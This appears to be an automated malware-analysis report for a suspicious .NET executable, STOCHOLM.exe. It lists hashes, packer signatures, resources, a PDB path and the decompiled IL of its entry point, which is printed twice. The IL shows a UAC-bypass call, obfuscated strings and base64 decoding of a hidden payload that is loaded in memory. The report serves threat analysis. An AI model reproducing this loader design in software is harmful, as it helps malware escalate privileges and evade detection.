Suspicious
Suspect

2f2bab6b13b2972b79bb42fdc561765b

PE Executable
|
MD5: 2f2bab6b13b2972b79bb42fdc561765b
|
Size: 900.1 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
2f2bab6b13b2972b79bb42fdc561765b
Sha1
2d1a0e1486a5eeaaee9d809db9555bfa02b8fa7b
Sha256
5b84ee852bff756a0f1a16734b2701c7da5a6e108eb6e188ebe5fa84dff375d8
Sha384
3c9435fc0ac36883b1a3dbf2d63b9b6dbceadbbb9d6edde75af74dfd5f8ef4cc1eb34b4ac06b50fb18aaf8b9956e3af3
Sha512
cf483c0f72dd679e4e7e8342ff7ef7443965024c25e4bb808e7c0aae83bf9067a1ed5adbe57a5e410614e0bd30a4c3588e428859df9dd09c310ae9766c059f71
SSDeep
12288:f75Gf8DzxhMU75Gf8DzxhMU2iND75Gf8DzxhMVySvgXOwI8T:f0f8DV90f8DVr1d0f8DVsCU8
TLSH
7815890066B383D5C96D01FA85A6D6EC4E718DE27369C339D98AFE492D3225E130D3B7

PeID

.NET executable
MEW 11 SE 1.2
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
2f2bab6b13b2972b79bb42fdc561765b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.reloc
.rsrc
Resources
RT_ICON
ID:0002
ID:0
ID:0-preview.png
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
STOCHOLM.Form1.resources
pictureBox1.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.AboutBox1.resources
logoPictureBox.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.Properties.Resources.resources
50717a60645a4af7b9bfb1c63c7d50c2
ab17a496c2544c9abb52c3b4d0acc913
c87e769c5d124385a3f0c9ad9b7b3c74
e5bc2ea453f94c6492ca332948052232
e4dec12129a64275bb67ae075f53dbc5
e0183d6e3dd94f268675016ce4b802ff
b869f563364549c6a055f9875bf52777
babdf81f95504e84a22ffd479dc93a8b
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Administrator\documents\visual studio 2010\Projects\STOCHOLM\STOCHOLM\obj\x86\Release\STOCHOLM.pdb
Module Name

STOCHOLM.exe
Full Name

STOCHOLM.exe
EntryPoint

System.Void WindowsFormsApplication1.Program::Main()
Scope Name

STOCHOLM.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

STOCHOLM
Assembly Version

18.5.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

55
Main Method

System.Void WindowsFormsApplication1.Program::Main()
Main IL Instruction Count

104
Main IL

br IL_000D: nop br IL_0013: ldc.i4 1 conv.ovf.i1.un <null> conv.i1 <null> div <null> nop <null> br IL_0005: br IL_0013 ldc.i4 1 ldc.i4 2047593740 ldc.i4 1305845588 ldc.i4 632579234 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldloca V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc V_6 ldloc V_0 brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute() leave IL_01B8: ret call System.Void WindowsFormsApplication1.UACBypass::Execute() call System.Void WindowsFormsApplication1.CoreManager::InitializeShield() call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity() ldc.i4 60000 call System.Void WindowsFormsApplication1.Program::S(System.UInt32) ldc.i4 1244124813 ldc.i4 1305766580 ldc.i4 632656356 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) stloc V_1 ldloc V_1 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse IL_008B: ldloc V_1 leave IL_01B8: ret ldloc V_1 ldc.i4 2114407108 ldc.i4 1305766582 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1432588284 ldc.i4 1305766582 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 1366866314 ldc.i4 1305766576 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1685068557 ldc.i4 1305766576 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 818148685 ldc.i4 1305766578 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 214370645 ldc.i4 1305766578 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) call System.Byte[] System.Convert::FromBase64String(System.String) stloc V_2 ldc.i4 1132450136 ldc.i4 1305766594 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_3 ldc.i4 309885496 ldc.i4 1305766626 ldc.i4 632579236 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_4 ldc.i4 1780730267 ldc.i4 1305766642 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_5 call System.AppDomain System.AppDomain::get_CurrentDomain() ldloc V_3 ldc.i4 1 ldloc V_2 ldloc V_4 ldloc V_5 call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String) leave IL_01A0: leave IL_01B8 pop <null> leave IL_01A0: leave IL_01B8 leave IL_01B8: ret ldloc V_6 brfalse IL_01B7: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> br IL_01BE: nop nop <null> br IL_01C6: br IL_0013 not <null> add.ovf <null> br IL_0013: ldc.i4 1 ret <null>
Module Name

STOCHOLM.exe
Full Name

STOCHOLM.exe
EntryPoint

System.Void WindowsFormsApplication1.Program::Main()
Scope Name

STOCHOLM.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

STOCHOLM
Assembly Version

18.5.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

55
Main Method

System.Void WindowsFormsApplication1.Program::Main()
Main IL Instruction Count

104
Main IL

br IL_000D: nop br IL_0013: ldc.i4 1 conv.ovf.i1.un <null> conv.i1 <null> div <null> nop <null> br IL_0005: br IL_0013 ldc.i4 1 ldc.i4 2047593740 ldc.i4 1305845588 ldc.i4 632579234 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldloca V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc V_6 ldloc V_0 brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute() leave IL_01B8: ret call System.Void WindowsFormsApplication1.UACBypass::Execute() call System.Void WindowsFormsApplication1.CoreManager::InitializeShield() call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity() ldc.i4 60000 call System.Void WindowsFormsApplication1.Program::S(System.UInt32) ldc.i4 1244124813 ldc.i4 1305766580 ldc.i4 632656356 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) stloc V_1 ldloc V_1 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse IL_008B: ldloc V_1 leave IL_01B8: ret ldloc V_1 ldc.i4 2114407108 ldc.i4 1305766582 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1432588284 ldc.i4 1305766582 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 1366866314 ldc.i4 1305766576 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1685068557 ldc.i4 1305766576 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 818148685 ldc.i4 1305766578 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 214370645 ldc.i4 1305766578 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) call System.Byte[] System.Convert::FromBase64String(System.String) stloc V_2 ldc.i4 1132450136 ldc.i4 1305766594 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_3 ldc.i4 309885496 ldc.i4 1305766626 ldc.i4 632579236 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_4 ldc.i4 1780730267 ldc.i4 1305766642 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_5 call System.AppDomain System.AppDomain::get_CurrentDomain() ldloc V_3 ldc.i4 1 ldloc V_2 ldloc V_4 ldloc V_5 call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String) leave IL_01A0: leave IL_01B8 pop <null> leave IL_01A0: leave IL_01B8 leave IL_01B8: ret ldloc V_6 brfalse IL_01B7: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> br IL_01BE: nop nop <null> br IL_01C6: br IL_0013 not <null> add.ovf <null> br IL_0013: ldc.i4 1 ret <null>
2f2bab6b13b2972b79bb42fdc561765b (900.1 KB)
File Structure
2f2bab6b13b2972b79bb42fdc561765b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.reloc
.rsrc
Resources
RT_ICON
ID:0002
ID:0
ID:0-preview.png
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
STOCHOLM.Form1.resources
pictureBox1.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.AboutBox1.resources
logoPictureBox.Image
[NBF]root.Data
[NBF]root.Data-preview.png
STOCHOLM.Properties.Resources.resources
50717a60645a4af7b9bfb1c63c7d50c2
ab17a496c2544c9abb52c3b4d0acc913
c87e769c5d124385a3f0c9ad9b7b3c74
e5bc2ea453f94c6492ca332948052232
e4dec12129a64275bb67ae075f53dbc5
e0183d6e3dd94f268675016ce4b802ff
b869f563364549c6a055f9875bf52777
babdf81f95504e84a22ffd479dc93a8b
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙